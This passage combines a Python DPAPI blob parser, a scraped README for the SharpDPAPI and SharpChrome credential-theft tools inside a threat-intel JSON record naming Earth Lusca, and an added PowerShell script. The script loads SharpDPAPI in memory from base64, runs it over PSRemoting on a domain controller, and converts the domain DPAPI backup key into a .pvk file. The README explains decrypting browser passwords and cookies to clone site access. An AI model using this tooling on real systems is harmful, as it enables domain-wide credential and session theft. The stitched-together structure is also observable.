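        raise ValueError('not a DPAPI blob: bad version/provider header')
    raw, off = _take(buf, off, 24)
    mk_version = struct.unpack_from('<I', raw, 0)[0]
    mk_guid = uuid.UUID(bytes_le=raw[4:20])
    flags = struct.unpack_from('<I', raw, 20)[0]
    desc, off = _take_lv(buf, off)            # UTF-16LE, NUL-terminated
    raw, off = _take(buf, off, 8)
    alg_crypt, crypt_bits = struct.unpack('<II', raw)
    salt, off = _take_lv(buf, off)
    hmac_key, off = _take_lv(buf, off)        # legacy field, normally empty
    raw, off = _take(buf, off, 8)
    alg_hash, hash_bits = struct.unpack('<II', raw)
    hmac2_key, off = _take_lv(buf, off)       # salt for the integrity HMAC
    data, off = _take_lv(buf, off)            # the ciphertext
    sign, off = _take_lv(buf, off)            # the integrity HMAC
    return {
        'guidMasterKey': '{%s}' % mk_guid,
        'masterKeyVersion': mk_version,
        'size': off - start,
        'flags': flags,
        'system': bool(flags & CRYPTPROTECT_SYSTEM),
        'description': desc.decode('utf-16-le').rstrip(chr(0)),
        'algCrypt': alg_crypt,
        'algCryptName': ALG_NAMES.get(alg_crypt, hex(alg_crypt)),
        'keyLen': crypt_bits,
        'algHash': alg_hash,
        'algHashName': ALG_NAMES.get(alg_hash, hex(alg_hash)),
        'hashLen': hash_bits,
        'salt': salt.hex(),
        'sign': sign.hex(),
        'data': data,
    }


def find_dpapi_blobs(buf):
    # What search does: look for BLOB_SIGNATURE in raw bytes. Each hit is also
    # parsed here, so a stray header that is not a whole blob is discarded.
    hits = []
    pos = buf.find(BLOB_SIGNATURE)
    while pos != -1:
        try:
            info = parse_dpapi_blob(buf, pos)
        except ValueError:
            pos = buf.find(BLOB_SIGNATURE, pos + 1)
            continue
        hits.append((pos, info))
        pos = buf.find(BLOB_SIGNATURE, pos + info['size'])
    return hits


SS_RE = re.compile(r'<SS N=.Password.>([0-9A-Fa-f]+)</SS>')


def blob_from_pscredential_clixml(xml_text):
    # Export-Clixml serialises the SecureString as the hex of a DPAPI blob in an
    # <SS> element; ps parses that blob. Either attribute quote style is accepted.
    m = SS_RE.search(xml_text)
    if not m:
        raise ValueError('no <SS N=Password> element found')
    return bytes.fromhex(m.group(1))


def build_sample_blob(master_key_guid=SAMPLE_MASTER_KEY_GUID, plaintext_len=24):
    # Constructed blob using the field values from the page's blob output
    # (flags 0, CALG_3DES/CALG_SHA). data and sign are filler bytes, not ciphertext.
    def lv(b):
        return struct.pack('<I', len(b)) + b
    padded = (plaintext_len // 8 + 1) * 8     # block-aligned filler length
    return (BLOB_SIGNATURE
            + struct.pack('<I', 1) + master_key_guid.bytes_le + struct.pack('<I', 0)
            + lv(bytes(2))                    # empty NUL-terminated description
            + struct.pack('<II', 0x6603, 192) # CALG_3DES, 192-bit key
            + lv(bytes(range(16)))            # salt
            + lv(b'')                         # HmacKey, empty
            + struct.pack('<II', 0x8004, 160) # CALG_SHA, 160-bit digest
            + lv(bytes(range(16, 32)))        # Hmac2Key
            + lv(bytes([0xAA]) * padded)      # filler ciphertext
            + lv(bytes([0xBB]) * 20))         # filler HMAC


def sample_clixml(blob):
    # Constructed approximation of Export-Clixml output for a PSCredential.
    return ('''<Objs Version='1.1.0.1' xmlns='http://schemas.microsoft.com/powershell/2004/04'>'''
            '''<Obj RefId='0'><TN RefId='0'><T>System.Management.Automation.PSCredential</T>'''
            '''<T>System.Object</T></TN><Props><S N='UserName'>user@testlab.local</S>'''
            '''<SS N='Password'>''' + blob.hex() + '''</SS></Props></Obj></Objs>''')


if __name__ == '__main__':
    blob = build_sample_blob()
    info = parse_dpapi_blob(blob)
    for key in ('guidMasterKey', 'size', 'flags', 'algHashName', 'algCryptName', 'description'):
        print('%-16s : %s' % (key, info[key]))
    buf = bytes(100) + blob + BLOB_SIGNATURE + bytes(3) + blob
    print('blob offsets in buffer:', [off for off, _ in find_dpapi_blobs(buf)])
    print('clixml round-trip ok:', blob_from_pscredential_clixml(sample_clixml(blob)) == blob)
```

Run stand-alone, it prints the same fields SharpDPAPI shows for a blob (guidMasterKey, size, flags, algHash/algCrypt, description) for the constructed blob, the offsets at which the scanner finds it inside a padded buffer, and whether the blob survives the clixml round trip. Note that the dec(blob) bytes in the blob2 example above start with the same 01 00 00 00 .. 01 15 .. 11 .. 7A 00 .. 4F pattern (non-printable bytes rendered as 3F), so that decrypted payload is itself another DPAPI blob and this scanner would flag it.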
To designate the data\r\ntype, use the /type argument specifying registry , folder , file , or base64 . If the /type argument is\r\nnot present, the command will search the registry by default.\r\nWhen searching the registry with no other arguments, the command will recursively search the\r\nHKEY_LOCAL_MACHINE and HKEY_USERS hives. Use the /path parameter to specify a root key to search\r\nfrom (e.g. /path:HKLM\\Software ) and use the /showErrors argument to display errors that occur during\r\nenumeration.\r\nWhen searching a file or folder, specify a path with /path:C:\\Path\\to\\file\\or\\folder and optionally use\r\n/maxBytes:\u003cint\u003e to specify the number of bytes to read from each file (default: 1024 bytes). The command will\r\nread the bytes from the beginning of the file and search for DPAPI blobs. Use /showErrors to display any errors\r\nthat occur during enumeration.\r\nWhen searching a base64 blob, specify the base64-encoded bytes to scan with the /base64:\u003cbase64 str\u003e\r\nparameter.\r\nSCCM\r\nIf elevated on a machine that is an SCCM client, and the SCCM environment is configured with a Network Access\r\nAccount (NAA), the DPAPI blobs containing the NAA credentials (protected by the system master key) can be retrieved\r\nvia WMI. The SCCM command will query the blobs via WMI, retrieve the system master keys, and decrypt the\r\nblobs.\r\nSharpChrome Commands\r\nlogins\r\nThe logins command will search for Chrome 'Login Data' files and decrypt the saved login passwords. If\r\nexecution is in an unelevated context, CryptUnprotectData() will automatically be used to try to decrypt values. If\r\n/browser:edge is specified, the newer Chromium-based Edge browser is triaged.\r\nLogin Data files can also be decrypted with a) any \"{GUID}:SHA1 {GUID}:SHA1 ...\" masterkeys passed, b) a\r\n/mkfile:FILE of one or more {GUID}:SHA1 masterkey mappings, c) a supplied DPAPI domain backup key\r\n( /pvk:BASE64...
or /pvk:key.pvk ) to first decrypt any user masterkeys, or d) a /password:X to decrypt any\r\nuser masterkeys, which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with\r\nMimikatz' sekurlsa::dpapi command.\r\nA specific Login Data file can be specified with /target:FILE . A remote /server:SERVER can be specified if a\r\n/pvk or /password is also supplied. If triaging newer Chrome/Edge instances, a /statekey:X AES state key\r\ncan be specified.\r\nBy default, logins are displayed in a csv format. This can be modified with /format:table for table output. Also,\r\nby default only non-null password value entries are displayed, but all values can be displayed with /showall .\r\nIf run from an elevated context, Login Data files for ALL users will be triaged, otherwise only Login Data files for\r\nthe current user will be processed.\r\ncookies\r\nThe cookies command will search for Chromium 'Cookies' files and decrypt cookie values. If execution is in an\r\nunelevated context, CryptUnprotectData() will automatically be used to try to decrypt values. You can change the\r\ntarget application using the /browser:\u003cVALUE\u003e argument (e.g., edge, brave, slack).\r\nCookie files can also be decrypted with a) any \"{GUID}:SHA1 {GUID}:SHA1 ...\" masterkeys passed, b) a\r\n/mkfile:FILE of one or more {GUID}:SHA1 masterkey mappings, c) a supplied DPAPI domain backup key\r\n( /pvk:BASE64... or /pvk:key.pvk ) to first decrypt any user masterkeys, or d) a /password:X to decrypt any\r\nuser masterkeys, which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with\r\nMimikatz' sekurlsa::dpapi command.\r\nA specific Cookies file can be specified with /target:FILE . A remote /server:SERVER can be specified if a\r\n/pvk or /password is also supplied.
If triaging newer Chrome/Edge instances, a /statekey:X AES state key\r\ncan be specified.\r\nBy default, cookies are displayed in a csv format. This can be modified with /format:table for table output, or\r\n/format:json for output importable by EditThisCookie. Also, by default only non-expired cookie value entries\r\nare displayed, but all values can be displayed with /showall .\r\nIf run from an elevated context, Cookie files for ALL users will be triaged, otherwise only Cookie files for the\r\ncurrent user will be processed.\r\nThe cookies command also has /cookie:REGEX and /url:REGEX arguments to only return cookie names or urls\r\nmatching the supplied regex. This is useful with /format:json to easily clone access to specific sites.\r\nstatekeys\r\nBy default, the statekeys command will search for Chromium-based applications (Google Chrome, Edge, Brave,\r\nand Slack), locate their AES statekey files (e.g., 'AppData\\Local\\Google\\Chrome\\User Data\\Local State' and\r\n'AppData\\Local\\Microsoft\\Edge\\User Data\\Local State'), and decrypt them using the same type of arguments that\r\ncan be supplied for cookies and logins . You may also supply the path to a specific state-key file using the\r\n/target: parameter (e.g., \"/target:C:\\Users\\Test\\appdata\\Local\\Google\\Chrome\\User Data\\Local State\" ).\r\nState keys can also be decrypted with a) any \"{GUID}:SHA1 {GUID}:SHA1 ...\" masterkeys passed, b) a\r\n/mkfile:FILE of one or more {GUID}:SHA1 masterkey mappings, c) a supplied DPAPI domain backup key\r\n( /pvk:BASE64... or /pvk:key.pvk ) to first decrypt any user masterkeys, or d) a /password:X to decrypt any\r\nuser masterkeys, which are then used as a lookup decryption table.
DPAPI GUID mappings can be recovered with\r\nMimikatz' sekurlsa::dpapi command.\r\nIf run from an elevated context, state keys for ALL users will be triaged, otherwise only state keys for the current\r\nuser will be processed.\r\nbackupkey\r\nThe backupkey command will retrieve the domain DPAPI backup key from a domain controller using the\r\nLsaRetrievePrivateData API approach from Mimikatz. This private key can then be used to decrypt master key\r\nblobs for any user on the domain. And even better, the key never changes ;)\r\nDomain admin (or equivalent) rights are needed to retrieve the key from a remote domain controller.\r\nThe /nowrap flag will prevent wrapping the base64 key on display.\r\nThis base64 key blob can be decoded to a binary .pvk file that can then be used with Mimikatz' dpapi::masterkey\r\n/in:MASTERKEY /pvk:backupkey.pvk module, or used in blob/file /pvk:X form with the masterkeys,\r\ncredentials, or vault SharpDPAPI commands.\r\nBy default, SharpDPAPI will try to determine the current domain controller via the DsGetDcName API call. A\r\nserver can be specified with /server:COMPUTER.domain.com . If you want the key saved to disk instead of output\r\nas a base64 blob, use /file:key.pvk .\r\nCompile Instructions\r\nWe are not planning on releasing binaries for SharpDPAPI, so you will have to compile yourself :)\r\nSharpDPAPI has been built against .NET 3.5 and is compatible with Visual Studio 2019 Community Edition.\r\nSimply open up the project .sln, choose \"Release\", and build.\r\nTargeting other .NET versions\r\nSharpDPAPI's default build configuration is for .NET 3.5, which will fail on systems without that version\r\ninstalled. 
To target SharpDPAPI for .NET 4 or 4.5, open the .sln solution, go to Project -\u003e SharpDPAPI\r\nProperties and change the \"Target framework\" to another version.\r\nSidenote: Running SharpDPAPI Through PowerShell\r\nIf you want to run SharpDPAPI in-memory through a PowerShell wrapper, first compile SharpDPAPI and\r\nbase64-encode the resulting assembly:\r\n[Convert]::ToBase64String([IO.File]::ReadAllBytes(\"C:\\Temp\\SharpDPAPI.exe\")) | Out-File -Encoding ASCII C:\\Temp\r\nSharpDPAPI can then be loaded in a PowerShell script with the following (where \"aa...\" is replaced with the\r\nbase64-encoded SharpDPAPI assembly string):\r\n$SharpDPAPIAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String(\"aa...\"))\r\nThe Main() method and any arguments can then be invoked as follows:\r\n[SharpDPAPI.Program]::Main(\"machinemasterkeys\")\r\nSidenote Sidenote: Running SharpDPAPI Over PSRemoting\r\nDue to the way PSRemoting handles output, we need to redirect stdout to a string and return that instead. Luckily,\r\nSharpDPAPI has a function to help with that.\r\nIf you follow the instructions in Sidenote: Running SharpDPAPI Through PowerShell to create a\r\nSharpDPAPI.ps1, append something like the following to the script:\r\n[SharpDPAPI.Program]::MainString(\"machinemasterkeys\")\r\nYou should then be able to run SharpDPAPI over PSRemoting with something like the following:\r\n$s = New-PSSession dc.theshire.local\r\nInvoke-Command -Session $s -FilePath C:\\Temp\\SharpDPAPI.ps1\r\nAlternatively, the SharpDPAPI /consoleoutfile:C:\\FILE.txt argument will redirect all output streams to the\r\nspecified file.\r\nSource: https://github.com/GhostPack/SharpDPAPI#certificates",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://github.com/GhostPack/SharpDPAPI#certificates"
	],
	"report_names": [
		"SharpDPAPI#certificates"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434266,
	"ts_updated_at": 1775792208,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b284a0a525992ee7cc41d5392553dc1c24ffc2e0.pdf",
		"text": "https://archive.orkl.eu/b284a0a525992ee7cc41d5392553dc1c24ffc2e0.txt",
		"img": "https://archive.orkl.eu/b284a0a525992ee7cc41d5392553dc1c24ffc2e0.jpg"
	}
}
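The two PowerShell sidenotes in the plain_text above (loading SharpDPAPI in memory from a base64-encoded assembly, then running it over PSRemoting through MainString) and the backupkey section's note that the base64 blob can be decoded to a .pvk file are steps of one workflow. The script below is an added example written for this page; it is not code from the SharpDPAPI project. It assumes the Release build sits at C:\Temp\SharpDPAPI.exe, that dc.theshire.local is the remote target, that MainString takes the command line as a single string (as the README's own MainString("machinemasterkeys") call shows), and that a PVK file begins with the header magic 0xB0B5F11E; the $blob variable in the usage comment is a placeholder for the base64 key that backupkey /nowrap prints.

```powershell
# Added example, not code from the SharpDPAPI project. It automates the two
# sidenotes (in-memory load through a PowerShell wrapper, then execution over
# PSRemoting) and adds a header check when turning a base64 backupkey blob into
# a .pvk file. All paths and the session target are assumptions.

# 1. Base64-encode the compiled Release build (assumed to sit in C:\Temp).
$exePath = 'C:\Temp\SharpDPAPI.exe'
$ps1Path = 'C:\Temp\SharpDPAPI.ps1'
$b64     = [Convert]::ToBase64String([IO.File]::ReadAllBytes($exePath))

# 2. Generate the wrapper script. It calls MainString rather than Main:
#    MainString returns stdout as a string, which PSRemoting serializes back to
#    the caller, whereas Main writes to the remote host's console and the caller
#    sees nothing. The command is passed as one string, matching the README's
#    MainString("machinemasterkeys") usage (assumption: that is its signature).
$wrapper = @"
param([string]`$Command = 'machinemasterkeys')
`$null = [System.Reflection.Assembly]::Load([Convert]::FromBase64String('$b64'))
[SharpDPAPI.Program]::MainString(`$Command)
"@
Set-Content -Path $ps1Path -Value $wrapper -Encoding ASCII

# 3. Run the wrapper on a remote host and keep the returned text. Machine
#    masterkey triage needs an elevated session on the target.
$session = New-PSSession -ComputerName 'dc.theshire.local'   # assumed target
$output  = Invoke-Command -Session $session -FilePath $ps1Path -ArgumentList 'machinemasterkeys'
Remove-PSSession $session
$output | Out-File -Encoding ASCII 'C:\Temp\machinemasterkeys.txt'

# 4. Turn the base64 blob printed by "backupkey /nowrap" into backupkey.pvk,
#    refusing input that does not start with the PVK file header magic
#    (0xB0B5F11E, stored little-endian), so a pasted banner line or a truncated
#    blob is caught before it is handed to /pvk:.
function ConvertTo-PvkFile {
    param(
        [Parameter(Mandatory)][string]$Base64Key,
        [Parameter(Mandatory)][string]$Path
    )
    $bytes = [Convert]::FromBase64String($Base64Key.Trim())
    if ($bytes.Length -lt 4) { throw 'Blob too short to be a PVK file' }
    # Read the first DWORD little-endian and compare as hex text; a hex
    # literal would be parsed as a signed Int32 in Windows PowerShell.
    $magic = [BitConverter]::ToUInt32($bytes, 0).ToString('X8')
    if ($magic -ne 'B0B5F11E') {
        throw "Not a PVK blob: header magic is 0x$magic"
    }
    [IO.File]::WriteAllBytes($Path, $bytes)
    Get-Item $Path
}

# Usage once the blob from "backupkey /nowrap" is in $blob (placeholder):
# ConvertTo-PvkFile -Base64Key $blob -Path 'C:\Temp\backupkey.pvk'
```

The wrapper is generated rather than hand-edited so the base64 string never has to be pasted by hand, and the command is a script parameter so the same SharpDPAPI.ps1 can run masterkeys, credentials or backupkey through Invoke-Command -ArgumentList without regenerating it. The resulting backupkey.pvk can be passed to SharpDPAPI as /pvk:C:\Temp\backupkey.pvk or to Mimikatz' dpapi::masterkey /pvk: module, as the backupkey section describes.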